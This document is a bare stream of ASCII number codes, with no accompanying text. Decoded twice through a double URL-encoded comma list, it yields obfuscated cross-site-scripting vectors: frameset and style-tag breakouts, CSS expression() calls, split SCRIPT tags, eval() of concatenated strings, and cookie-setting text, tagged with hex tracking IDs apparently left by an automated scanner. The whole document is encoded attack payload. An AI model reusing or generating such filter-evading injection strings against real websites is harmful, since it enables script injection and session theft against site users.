37,50,53,50,67,53,54,37,50,53,50,67,52,56,37,50,53,50,67,52,56,37,50,53,50,67,53,52,37,50,53,50,67,53,55,37,50,53,50,67,52,56,37,50,53,50,67,53,53,37,50,53,50,67,53,50,37,50,53,50,67,53,49,37,50,53,50,67,49,48,48,37,50,53,50,67,53,49,37,50,53,50,67,57,56,37,50,53,50,67,53,53,37,50,53,50,67,49,48,50,37,50,53,50,67,53,50,37,50,53,50,67,53,55,37,50,53,50,67,52,56,37,50,53,50,67,57,57,37,50,53,50,67,51,52,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,52,55,37,50,53,50,67,55,48,37,50,53,50,67,56,50,37,50,53,50,67,54,53,37,50,53,50,67,55,55,37,50,53,50,67,54,57,37,50,53,50,67,56,51,37,50,53,50,67,54,57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2,37,50,53,50,67,54,53,37,50,53,50,67,54,54,37,50,53,50,67,55,54,37,50,53,50,67,54,57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3,51,37,50,53,50,67,52,56,37,50,53,50,67,52,57,37,50,53,50,67,52,56,37,50,53,50,67,57,56,37,50,53,50,67,53,51,37,50,53,50,67,53,48,37,50,53,50,67,53,48,37,50,53,50,67,57,55,37,50,53,50,67,57,56,37,50,53,50,67,53,53,37,50,53,50,67,53,54,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,48,37,50,53,50,67,53,51,37,50,53,50,67,53,48,37,50,53,50,67,53,51,37,50,53,50,67,53,54,37,50,53,50,67,57,56,37,50,53,50,67,53,55,37,50,53,50,67,53,50,37,50,53,50,67,53,55,37,50,53,50,67,57,56,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,49,37,50,53,50,67,53,48,37,50,53,50,67,53,53,37,50,53,50,67,53,53,37,50,53,50,67,52,56,37,50,53,50,67,53,54,37,50,53,50,67,57,57,37,50,53,50,67,57,56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2,37,50,53,50,67,54,53,37,50,53,50,67,54,54,37,50,53,50,67,55,54,37,50,53,50,67,54,57,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,56,52,37,50,53,50,67,54,56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3,51,37,50,53,50,67,53,54,37,50,53,50,67,53,55,37,50,53,50,67,53,53,37,50,53,50,67,52,56,37,50,53,50,67,53,48,37,50,53,50,67,53,55,37,50,53,50,67,49,48,50,37,50,53,50,67,53,53,37,50,53,50,67,53,51,37,50,53,50,67,49,48,50,37,50,53,50,67,57,57,37,50,53,50,67,53,54,37,50,53,50,67,53,55,37,50,53,50,67,52,57,37,50,53,50,67,57,55,37,50,53,50,67,53,50,37,50,53,50,67,57,56,37,50,53,50,67,53,50,37,50,53,50,67,53,50,37,50,53,50,67,53,49,37,50,53,50,67,57,56,37,50,53,50,67,49,48,49,37,50,53,50,67,57,55,37,50,53,50,67,53,49,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,48,37,50,53,50,67,53,48,37,50,53,50,67,52,56,37,50,53,50,67,53,48,37,50,53,50,67,53,53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1,56,37,50,53,50,67,51,53,37,50,53,50,67,52,57,37,50,53,50,67,53,57,37,50,53,50,67,53,52,37,50,53,50,67,53,50,37,50,53,50,67,53,54,37,50,53,50,67,52,57,37,50,53,50,67,49,48,50,37,50,53,50,67,52,57,37,50,53,50,67,57,55,37,50,53,50,67,49,48,50,37,50,53,50,67,53,49,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,50,37,50,53,50,67,53,55,37,50,53,50,67,49,48,48,37,50,53,50,67,53,55,37,50,53,50,67,49,48,48,37,50,53,50,67,57,56,37,50,53,50,67,57,56,37,50,53,50,67,53,55,37,50,53,50,67,49,48,50,37,50,53,50,67,52,56,37,50,53,50,67,57,55,37,50,53,50,67,57,56,37,50,53,50,67,53,53,37,50,53,50,67,49,48,50,37,50,53,50,67,53,54,37,50,53,50,67,57,55,37,50,53,50,67,49,48,50,37,50,53,50,67,57,57,37,50,53,50,67,49,48,48,37,50,53,50,67,53,49,37,50,53,50,67,53,52,37,50,53,50,67,53,54,37,50,53,50,67,52,49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49,49,57,37,50,53,50,67,49,48,53,37,50,53,50,67,49,48,48,37,50,53,50,67,49,49,54,37,50,53,50,67,49,48,52,37,50,53,50,67,53,56,37,50,53,50,67,51,50,37,50,53,50,67,49,48,49,37,50,53,50,67,49,50,48,37,50,53,50,67,49,49,50,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48,49,37,50,53,50,67,49,49,53,37,50,53,50,67,49,49,53,37,50,53,50,67,49,48,53,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,48,37,50,53,50,67,52,48,37,50,53,50,67,53,51,37,50,53,50,67,53,52,37,50,53,50,67,57,56,37,50,53,50,67,49,48,50,37,50,53,50,67,52,57,37,50,53,50,67,53,54,37,50,53,50,67,57,57,37,50,53,50,67,57,55,37,50,53,50,67,52,57,37,50,53,50,67,52,57,37,50,53,50,67,53,51,37,50,53,50,67,52,57,37,50,53,50,67,57,55,37,50,53,50,67,53,49,37,50,53,50,67,53,53,37,50,53,50,67,53,50,37,50,53,50,67,52,57,37,50,53,50,67,57,57,37,50,53,50,67,52,56,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,48,37,50,53,50,67,57,55,37,50,53,50,67,53,55,37,50,53,50,67,53,51,37,50,53,50,67,53,55,37,50,53,50,67,53,49,37,50,53,50,67,52,57,37,50,53,50,67,57,55,37,50,53,50,67,53,53,37,50,53,50,67,57,55,37,50,53,50,67,53,50,37,50,53,50,67,53,54,37,50,53,50,67,52,49,37,50,53,50,67,53,57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2,37,50,53,50,67,56,57,37,50,53,50,67,55,54,37,50,53,50,67,54,57,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,49,50,48,37,50,53,50,67,49,49,53,37,50,53,50,67,49,49,53,37,50,53,50,67,53,56,37,50,53,50,67,49,48,49,37,50,53,50,67,49,50,48,37,50,53,50,67,49,49,50,37,50,53,50,67,49,49,52,37,50,53,50,67,52,55,37,50,53,50,67,52,50,37,50,53,50,67,49,48,48,37,50,53,50,67,52,57,37,50,53,50,67,52,57,37,50,53,50,67,49,48,50,37,50,53,50,67,57,55,37,50,53,50,67,49,48,49,37,50,53,50,67,53,55,37,50,53,50,67,57,57,37,50,53,50,67,57,55,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,48,37,50,53,50,67,53,51,37,50,53,50,67,49,48,50,37,50,53,50,67,53,54,37,50,53,50,67,57,57,37,50,53,50,67,52,57,37,50,53,50,67,53,48,37,50,53,50,67,49,48,48,37,50,53,50,67,57,57,37,50,53,50,67,53,49,37,50,53,50,67,57,55,37,50,53,50,67,49,48,49,37,50,53,50,67,52,56,37,50,53,50,67,49,48,49,37,50,53,50,67,53,55,37,50,53,50,67,52,56,37,50,53,50,67,53,50,37,50,53,50,67,53,50,37,50,53,50,67,53,53,37,50,53,50,67,52,56,37,50,53,50,67,52,57,37,50,53,50,67,49,48,49,37,50,53,50,67,52,50,37,50,53,50,67,52,55,37,50,53,50,67,49,48,49,37,50,53,50,67,49,49,53,37,50,53,50,67,49,49,53,37,50,53,50,67,49,48,53,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,48,37,50,53,50,67,52,48,37,50,53,50,67,49,48,48,37,50,53,50,67,52,57,37,50,53,50,67,52,57,37,50,53,50,67,49,48,50,37,50,53,50,67,57,55,37,50,53,50,67,49,48,49,37,50,53,50,67,53,55,37,50,53,50,67,57,57,37,50,53,50,67,57,55,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,48,37,50,53,50,67,53,51,37,50,53,50,67,49,48,50,37,50,53,50,67,53,54,37,50,53,50,67,57,57,37,50,53,50,67,52,57,37,50,53,50,67,53,48,37,50,53,50,67,49,48,48,37,50,53,50,67,57,57,37,50,53,50,67,53,49,37,50,53,50,67,57,55,37,50,53,50,67,49,48,49,37,50,53,50,67,52,56,37,50,53,50,67,49,48,49,37,50,53,50,67,53,55,37,50,53,50,67,52,56,37,50,53,50,67,53,50,37,50,53,50,67,53,50,37,50,53,50,67,53,53,37,50,53,50,67,52,56,37,50,53,50,67,52,57,37,50,53,50,67,49,48,49,37,50,53,50,67,52,49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3,52,37,50,53,50,67,52,56,37,50,53,50,67,53,54,37,50,53,50,67,57,55,37,50,53,50,67,53,54,37,50,53,50,67,57,55,37,50,53,50,67,53,48,37,50,53,50,67,53,53,37,50,53,50,67,53,51,37,50,53,50,67,49,48,49,37,50,53,50,67,57,57,37,50,53,50,67,53,51,37,50,53,50,67,52,57,37,50,53,50,67,57,55,37,50,53,50,67,53,53,37,50,53,50,67,53,53,37,50,53,50,67,53,53,37,50,53,50,67,52,57,37,50,53,50,67,53,49,37,50,53,50,67,57,56,37,50,53,50,67,53,49,37,50,53,50,67,53,54,37,50,53,50,67,57,55,37,50,53,50,67,53,52,37,50,53,50,67,53,52,37,50,53,50,67,57,57,37,50,53,50,67,52,57,37,50,53,50,67,53,50,37,50,53,50,67,53,55,37,50,53,50,67,53,52,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,50,37,50,53,50,67,51,50,37,50,53,50,67,56,51,37,50,53,50,67,56,52,37,50,53,50,67,56,57,37,50,53,50,67,55,54,37,50,53,50,67,54,57,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,49,50,48,37,50,53,50,67,49,49,53,37,50,53,50,67,49,49,53,37,50,53,50,67,53,56,37,50,53,50,67,49,48,49,37,50,53,50,67,49,50,48,37,50,53,50,67,49,49,50,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48,49,37,50,53,50,67,49,49,53,37,50,53,50,67,49,49,53,37,50,53,50,67,49,48,53,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,48,37,50,53,50,67,52,48,37,50,53,50,67,53,52,37,50,53,50,67,52,56,37,50,53,50,67,53,54,37,50,53,50,67,57,55,37,50,53,50,67,53,54,37,50,53,50,67,57,55,37,50,53,50,67,53,48,37,50,53,50,67,53,53,37,50,53,50,67,53,51,37,50,53,50,67,49,48,49,37,50,53,50,67,57,57,37,50,53,50,67,53,51,37,50,53,50,67,52,57,37,50,53,50,67,57,55,37,50,53,50,67,53,53,37,50,53,50,67,53,53,37,50,53,50,67,53,53,37,50,53,50,67,52,57,37,50,53,50,67,53,49,37,50,53,50,67,57,56,37,50,53,50,67,53,49,37,50,53,50,67,53,54,37,50,53,50,67,57,55,37,50,53,50,67,53,52,37,50,53,50,67,53,52,37,50,53,50,67,57,57,37,50,53,50,67,52,57,37,50,53,50,67,53,50,37,50,53,50,67,53,55,37,50,53,50,67,53,52,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,50,37,50,53,50,67,52,49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1,37,50,53,50,67,56,52,37,50,53,50,67,56,57,37,50,53,50,67,55,54,37,50,53,50,67,54,57,37,50,53,50,67,51,50,37,50,53,50,67,56,52,37,50,53,50,67,56,57,37,50,53,50,67,56,48,37,50,53,50,67,54,57,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,49,49,54,37,50,53,50,67,49,48,49,37,50,53,50,67,49,50,48,37,50,53,50,67,49,49,54,37,50,53,50,67,52,55,37,50,53,50,67,49,48,54,37,50,53,50,67,57,55,37,50,53,50,67,49,49,56,37,50,53,50,67,57,55,37,50,53,50,67,49,49,53,37,50,53,50,67,57,57,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48,53,37,50,53,50,67,49,49,50,37,50,53,50,67,49,49,54,37,50,53,50,67,51,52,37,50,53,50,67,54,50,37,50,53,50,67,52,56,37,50,53,50,67,53,48,37,50,53,50,67,57,55,37,50,53,50,67,57,57,37,50,53,50,67,53,53,37,50,53,50,67,53,54,37,50,53,50,67,49,48,50,37,50,53,50,67,53,49,37,50,53,50,67,53,52,37,50,53,50,67,53,52,37,50,53,50,67,52,56,37,50,53,50,67,53,53,37,50,53,50,67,52,57,37,50,53,50,67,49,48,50,37,50,53,50,67,52,57,37,50,53,50,67,49,48,50,37,50,53,50,67,53,50,37,50,53,50,67,53,50,37,50,53,50,67,57,56,37,50,53,50,67,52,56,37,50,53,50,67,57,56,37,50,53,50,67,49,48,48,37,50,53,50,67,53,53,37,50,53,50,67,53,48,37,50,53,50,67,53,49,37,50,53,50,67,57,57,37,50,53,50,67,53,55,37,50,53,50,67,53,53,37,50,53,50,67,49,48,50,37,50,53,50,67,57,57,37,50,53,50,67,52,56,37,50,53,50,67,53,48,37,50,53,50,67,54,48,37,50,53,50,67,52,55,37,50,53,50,67,56,51,37,50,53,50,67,56,52,37,50,53,50,67,56,57,37,50,53,50,67,55,54,37,50,53,50,67,54,57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1,37,50,53,50,67,56,52,37,50,53,50,67,56,57,37,50,53,50,67,55,54,37,50,53,50,67,54,57,37,50,53,50,67,54,50,37,50,53,50,67,52,54,37,50,53,50,67,57,55,37,50,53,50,67,57,55,37,50,53,50,67,57,56,37,50,53,50,67,49,48,49,37,50,53,50,67,57,55,37,50,53,50,67,53,50,37,50,53,50,67,53,51,37,50,53,50,67,53,54,37,50,53,50,67,49,48,48,37,50,53,50,67,53,55,37,50,53,50,67,53,53,37,50,53,50,67,52,56,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,50,37,50,53,50,67,52,56,37,50,53,50,67,53,54,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,48,37,50,53,50,67,52,56,37,50,53,50,67,53,52,37,50,53,50,67,53,55,37,50,53,50,67,53,50,37,50,53,50,67,49,48,49,37,50,53,50,67,53,52,37,50,53,50,67,49,48,49,37,50,53,50,67,53,53,37,50,53,50,67,53,54,37,50,53,50,67,52,56,37,50,53,50,67,57,56,37,50,53,50,67,57,57,37,50,53,50,67,49,48,48,37,50,53,50,67,57,56,37,50,53,50,67,49,50,51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49,49,55,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48,56,37,50,53,50,67,52,48,37,50,53,50,67,51,52,37,50,53,50,67,57,55,37,50,53,50,67,57,55,37,50,53,50,67,57,56,37,50,53,50,67,49,48,49,37,50,53,50,67,57,55,37,50,53,50,67,53,50,37,50,53,50,67,53,51,37,50,53,50,67,53,54,37,50,53,50,67,49,48,48,37,50,53,50,67,53,55,37,50,53,50,67,53,53,37,50,53,50,67,52,56,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,50,37,50,53,50,67,52,56,37,50,53,50,67,53,54,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,48,37,50,53,50,67,52,56,37,50,53,50,67,53,52,37,50,53,50,67,53,55,37,50,53,50,67,53,50,37,50,53,50,67,49,48,49,37,50,53,50,67,53,52,37,50,53,50,67,49,48,49,37,50,53,50,67,53,53,37,50,53,50,67,53,54,37,50,53,50,67,52,56,37,50,53,50,67,57,56,37,50,53,50,67,57,57,37,50,53,50,67,49,48,48,37,50,53,50,67,57,56,37,50,53,50,67,51,52,37,50,53,50,67,52,49,37,50,53,50,67,53,57,37,50,53,50,67,49,50,53,37,50,53,50,67,54,48,37,50,53,50,67,52,55,37,50,53,50,67,56,51,37,50,53,50,67,56,52,37,50,53,50,67,56,57,37,50,53,50,67,55,54,37,50,53,50,67,54,57,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,54,53,37,50,53,50,67,51,50,37,50,53,50,67,54,55,37,50,53,50,67,55,54,37,50,53,50,67,54,53,37,50,53,50,67,56,51,37,50,53,50,67,56,51,37,50,53,50,67,54,49,37,50,53,50,67,57,55,37,50,53,50,67,57,55,37,50,53,50,67,57,56,37,50,53,50,67,49,48,49,37,50,53,50,67,57,55,37,50,53,50,67,53,50,37,50,53,50,67,53,51,37,50,53,50,67,53,54,37,50,53,50,67,49,48,48,37,50,53,50,67,53,55,37,50,53,50,67,53,53,37,50,53,50,67,52,56,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,50,37,50,53,50,67,52,56,37,50,53,50,67,53,54,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,48,37,50,53,50,67,52,56,37,50,53,50,67,53,52,37,50,53,50,67,53,55,37,50,53,50,67,53,50,37,50,53,50,67,49,48,49,37,50,53,50,67,53,52,37,50,53,50,67,49,48,49,37,50,53,50,67,53,53,37,50,53,50,67,53,54,37,50,53,50,67,52,56,37,50,53,50,67,57,56,37,50,53,50,67,57,57,37,50,53,50,67,49,48,48,37,50,53,50,67,57,56,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,52,55,37,50,53,50,67,54,53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1,37,50,53,50,67,56,52,37,50,53,50,67,56,57,37,50,53,50,67,55,54,37,50,53,50,67,54,57,37,50,53,50,67,51,50,37,50,53,50,67,49,49,54,37,50,53,50,67,49,50,49,37,50,53,50,67,49,49,50,37,50,53,50,67,49,48,49,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,49,49,54,37,50,53,50,67,49,48,49,37,50,53,50,67,49,50,48,37,50,53,50,67,49,49,54,37,50,53,50,67,52,55,37,50,53,50,67,57,57,37,50,53,50,67,49,49,53,37,50,53,50,67,49,49,53,37,50,53,50,67,51,52,37,50,53,50,67,54,50,37,50,53,50,67,54,54,37,50,53,50,67,55,57,37,50,53,50,67,54,56,37,50,53,50,67,56,57,37,50,53,50,67,49,50,51,37,50,53,50,67,57,56,37,50,53,50,67,57,55,37,50,53,50,67,57,57,37,50,53,50,67,49,48,55,37,50,53,50,67,49,48,51,37,50,53,50,67,49,49,52,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,55,37,50,53,50,67,49,49,48,37,50,53,50,67,49,48,48,37,50,53,50,67,53,56,37,50,53,50,67,49,49,55,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48,56,37,50,53,50,67,52,48,37,50,53,50,67,51,52,37,50,53,50,67,53,55,37,50,53,50,67,57,56,37,50,53,50,67,53,54,37,50,53,50,67,53,51,37,50,53,50,67,49,48,48,37,50,53,50,67,53,48,37,50,53,50,67,53,53,37,50,53,50,67,53,54,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,48,37,50,53,50,67,53,49,37,50,53,50,67,57,57,37,50,53,50,67,53,52,37,50,53,50,67,57,57,37,50,53,50,67,49,48,49,37,50,53,50,67,53,53,37,50,53,50,67,49,48,50,37,50,53,50,67,57,55,37,50,53,50,67,49,48,50,37,50,53,50,67,53,48,37,50,53,50,67,53,49,37,50,53,50,67,53,50,37,50,53,50,67,49,48,48,37,50,53,50,67,52,57,37,50,53,50,67,49,48,48,37,50,53,50,67,57,56,37,50,53,50,67,53,49,37,50,53,50,67,57,56,37,50,53,50,67,57,55,37,50,53,50,67,53,50,37,50,53,50,67,53,52,37,50,53,50,67,53,52,37,50,53,50,67,51,52,37,50,53,50,67,52,49,37,50,53,50,67,49,50,53,37,50,53,50,67,54,48,37,50,53,50,67,52,55,37,50,53,50,67,56,51,37,50,53,50,67,56,52,37,50,53,50,67,56,57,37,50,53,50,67,55,54,37,50,53,50,67,54,57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1,51,37,50,53,50,67,52,53,37,50,53,50,67,52,53,37,50,53,50,67,57,49,37,50,53,50,67,49,48,53,37,50,53,50,67,49,48,50,37,50,53,50,67,51,50,37,50,53,50,67,49,48,51,37,50,53,50,67,49,49,54,37,50,53,50,67,49,48,49,37,50,53,50,67,51,50,37,50,53,50,67,55,51,37,50,53,50,67,54,57,37,50,53,50,67,51,50,37,50,53,50,67,53,50,37,50,53,50,67,57,51,37,50,53,50,67,54,50,37,50,53,50,67,57,57,37,50,53,50,67,57,56,37,50,53,50,67,53,55,37,50,53,50,67,57,55,37,50,53,50,67,53,49,37,50,53,50,67,49,48,50,37,50,53,50,67,53,51,37,50,53,50,67,53,51,37,50,53,50,67,53,49,37,50,53,50,67,53,53,37,50,53,50,67,49,48,50,37,50,53,50,67,53,53,37,50,53,50,67,52,56,37,50,53,50,67,53,49,37,50,53,50,67,57,57,37,50,53,50,67,57,57,37,50,53,50,67,53,55,37,50,53,50,67,49,48,48,37,50,53,50,67,57,55,37,50,53,50,67,53,52,37,50,53,50,67,57,55,37,50,53,50,67,53,51,37,50,53,50,67,52,56,37,50,53,50,67,53,50,37,50,53,50,67,57,55,37,50,53,50,67,53,50,37,50,53,50,67,53,53,37,50,53,50,67,53,54,37,50,53,50,67,57,56,37,50,53,50,67,53,52,37,50,53,50,67,53,48,37,50,53,50,67,53,55,37,50,53,50,67,54,48,37,50,53,50,67,51,51,37,50,53,50,67,57,49,37,50,53,50,67,49,48,49,37,50,53,50,67,49,49,48,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,53,37,50,53,50,67,49,48,50,37,50,53,50,67,57,51,37,50,53,50,67,52,53,37,50,53,50,67,52,53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4,37,50,53,50,67,54,53,37,50,53,50,67,56,51,37,50,53,50,67,54,57,37,50,53,50,67,51,50,37,50,53,50,67,55,50,37,50,53,50,67,56,50,37,50,53,50,67,54,57,37,50,53,50,67,55,48,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,52,57,37,50,53,50,67,49,48,48,37,50,53,50,67,57,57,37,50,53,50,67,53,52,37,50,53,50,67,57,55,37,50,53,50,67,53,50,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,50,37,50,53,50,67,53,50,37,50,53,50,67,53,55,37,50,53,50,67,57,55,37,50,53,50,67,53,51,37,50,53,50,67,49,48,50,37,50,53,50,67,52,56,37,50,53,50,67,53,50,37,50,53,50,67,53,49,37,50,53,50,67,57,55,37,50,53,50,67,53,49,37,50,53,50,67,53,49,37,50,53,50,67,49,48,50,37,50,53,50,67,57,55,37,50,53,50,67,53,48,37,50,53,50,67,52,56,37,50,53,50,67,52,56,37,50,53,50,67,53,48,37,50,53,50,67,57,55,37,50,53,50,67,53,53,37,50,53,50,67,52,56,37,50,53,50,67,49,48,50,37,50,53,50,67,52,57,37,50,53,50,67,57,56,37,50,53,50,67,49,48,48,37,50,53,50,67,52,55,37,50,53,50,67,52,55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7,37,50,53,50,67,54,54,37,50,53,50,67,55,52,37,50,53,50,67,54,57,37,50,53,50,67,54,55,37,50,53,50,67,56,52,37,50,53,50,67,51,50,37,50,53,50,67,57,57,37,50,53,50,67,49,48,56,37,50,53,50,67,57,55,37,50,53,50,67,49,49,53,37,50,53,50,67,49,49,53,37,50,53,50,67,49,48,53,37,50,53,50,67,49,48,48,37,50,53,50,67,54,49,37,50,53,50,67,57,57,37,50,53,50,67,49,48,56,37,50,53,50,67,49,49,53,37,50,53,50,67,49,48,53,37,50,53,50,67,49,48,48,37,50,53,50,67,53,56,37,50,53,50,67,57,55,37,50,53,50,67,49,48,49,37,50,53,50,67,53,48,37,50,53,50,67,53,50,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,48,37,50,53,50,67,57,55,37,50,53,50,67,49,48,49,37,50,53,50,67,52,53,37,50,53,50,67,52,56,37,50,53,50,67,53,49,37,50,53,50,67,57,57,37,50,53,50,67,53,52,37,50,53,50,67,52,53,37,50,53,50,67,52,57,37,50,53,50,67,52,57,37,50,53,50,67,49,48,48,37,50,53,50,67,52,57,37,50,53,50,67,52,53,37,50,53,50,67,53,54,37,50,53,50,67,57,56,37,50,53,50,67,53,53,37,50,53,50,67,53,52,37,50,53,50,67,52,53,37,50,53,50,67,52,56,37,50,53,50,67,52,56,37,50,53,50,67,53,54,37,50,53,50,67,52,56,37,50,53,50,67,57,57,37,50,53,50,67,53,53,37,50,53,50,67,53,50,37,50,53,50,67,53,50,37,50,53,50,67,49,48,50,37,50,53,50,67,53,49,37,50,53,50,67,53,54,37,50,53,50,67,53,55,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,49,49,50,37,50,53,50,67,57,55,37,50,53,50,67,49,49,52,37,50,53,50,67,57,55,37,50,53,50,67,49,48,57,37,50,53,50,67,51,50,37,50,53,50,67,49,49,48,37,50,53,50,67,57,55,37,50,53,50,67,49,48,57,37,50,53,50,67,49,48,49,37,50,53,50,67,54,49,37,50,53,50,67,49,49,55,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48,56,37,50,53,50,67,51,50,37,50,53,50,67,49,49,56,37,50,53,50,67,57,55,37,50,53,50,67,49,48,56,37,50,53,50,67,49,49,55,37,50,53,50,67,49,48,49,37,50,53,50,67,54,49,37,50,53,50,67,53,54,37,50,53,50,67,52,56,37,50,53,50,67,53,54,37,50,53,50,67,53,50,37,50,53,50,67,57,56,37,50,53,50,67,57,55,37,50,53,50,67,53,53,37,50,53,50,67,57,55,37,50,53,50,67,57,55,37,50,53,50,67,53,51,37,50,53,50,67,49,48,50,37,50,53,50,67,57,55,37,50,53,50,67,52,56,37,50,53,50,67,49,48,50,37,50,53,50,67,52,56,37,50,53,50,67,49,48,49,37,50,53,50,67,57,55,37,50,53,50,67,53,48,37,50,53,50,67,53,49,37,50,53,50,67,53,52,37,50,53,50,67,57,57,37,50,53,50,67,53,51,37,50,53,50,67,53,49,37,50,53,50,67,49,48,48,37,50,53,50,67,53,52,37,50,53,50,67,53,50,37,50,53,50,67,57,57,37,50,53,50,67,53,54,37,50,53,50,67,49,48,49,37,50,53,50,67,57,56,37,50,53,50,67,53,48,37,50,53,50,67,49,48,49,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,52,55,37,50,53,50,67,55,57,37,50,53,50,67,54,54,37,50,53,50,67,55,52,37,50,53,50,67,54,57,37,50,53,50,67,54,55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7,55,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,49,48,51,37,50,53,50,67,49,48,49,37,50,53,50,67,49,49,54,37,50,53,50,67,51,52,37,50,53,50,67,53,57,37,50,53,50,67,57,56,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,56,53,37,50,53,50,67,56,50,37,50,53,50,67,55,54,37,50,53,50,67,52,48,37,50,53,50,67,51,52,37,50,53,50,67,51,52,37,50,53,50,67,53,57,37,50,53,50,67,57,57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1,52,37,50,53,50,67,53,57,37,50,53,50,67,49,48,48,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,52,57,37,50,53,50,67,53,48,37,50,53,50,67,52,56,37,50,53,50,67,53,50,37,50,53,50,67,49,48,49,37,50,53,50,67,52,56,37,50,53,50,67,52,56,37,50,53,50,67,57,57,37,50,53,50,67,53,49,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,50,37,50,53,50,67,53,51,37,50,53,50,67,53,50,37,50,53,50,67,57,55,37,50,53,50,67,57,55,37,50,53,50,67,53,50,37,50,53,50,67,53,53,37,50,53,50,67,49,48,49,37,50,53,50,67,57,56,37,50,53,50,67,52,57,37,50,53,50,67,57,56,37,50,53,50,67,53,52,37,50,53,50,67,53,55,37,50,53,50,67,57,56,37,50,53,50,67,49,48,49,37,50,53,50,67,57,55,37,50,53,50,67,49,48,50,37,50,53,50,67,57,57,37,50,53,50,67,53,52,37,50,53,50,67,53,50,37,50,53,50,67,53,52,37,50,53,50,67,51,52,37,50,53,50,67,52,49,37,50,53,50,67,51,52,37,50,53,50,67,53,57,37,50,53,50,67,49,48,49,37,50,53,50,67,49,49,56,37,50,53,50,67,57,55,37,50,53,50,67,49,48,56,37,50,53,50,67,52,48,37,50,53,50,67,57,55,37,50,53,50,67,52,51,37,50,53,50,67,57,56,37,50,53,50,67,52,51,37,50,53,50,67,57,57,37,50,53,50,67,52,51,37,50,53,50,67,49,48,48,37,50,53,50,67,52,49,37,50,53,50,67,53,57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1,37,50,53,50,67,51,50,37,50,53,50,67,49,48,49,37,50,53,50,67,57,57,37,50,53,50,67,49,48,52,37,50,53,50,67,49,49,49,37,50,53,50,67,52,48,37,50,53,50,67,51,57,37,50,53,50,67,54,48,37,50,53,50,67,56,51,37,50,53,50,67,54,55,37,50,53,50,67,56,50,37,50,53,50,67,52,49,37,50,53,50,67,51,57,37,50,53,50,67,53,57,37,50,53,50,67,49,48,49,37,50,53,50,67,57,57,37,50,53,50,67,49,48,52,37,50,53,50,67,49,49,49,37,50,53,50,67,52,48,37,50,53,50,67,51,57,37,50,53,50,67,55,51,37,50,53,50,67,56,48,37,50,53,50,67,56,52,37,50,53,50,67,54,50,37,50,53,50,67,53,54,37,50,53,50,67,53,53,37,50,53,50,67,52,57,37,50,53,50,67,53,49,37,50,53,50,67,49,48,48,37,50,53,50,67,53,52,37,50,53,50,67,49,48,48,37,50,53,50,67,52,56,37,50,53,50,67,57,56,37,50,53,50,67,49,48,49,37,50,53,50,67,53,52,37,50,53,50,67,52,56,37,50,53,50,67,53,55,37,50,53,50,67,53,55,37,50,53,50,67,53,53,37,50,53,50,67,53,52,37,50,53,50,67,52,56,37,50,53,50,67,53,54,37,50,53,50,67,52,57,37,50,53,50,67,53,54,37,50,53,50,67,49,48,49,37,50,53,50,67,53,52,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,48,37,50,53,50,67,57,55,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,50,37,50,53,50,67,53,49,37,50,53,50,67,49,48,49,37,50,53,50,67,54,48,37,50,53,50,67,52,55,37,50,53,50,67,56,51,37,50,53,50,67,54,55,37,50,53,50,67,56,50,37,50,53,50,67,55,51,37,50,53,50,67,56,48,37,50,53,50,67,56,52,37,50,53,50,67,54,50,37,50,53,50,67,51,57,37,50,53,50,67,52,49,37,50,53,50,67,53,57,37,50,53,50,67,51,50,37,50,53,50,67,54,51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54,49,37,50,53,50,67,51,52,37,50,53,50,67,56,51,37,50,53,50,67,49,48,49,37,50,53,50,67,49,49,54,37,50,53,50,67,52,53,37,50,53,50,67,54,55,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,49,37,50,53,50,67,49,48,55,37,50,53,50,67,49,48,53,37,50,53,50,67,49,48,49,37,50,53,50,67,51,52,37,50,53,50,67,51,50,37,50,53,50,67,54,55,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,48,37,50,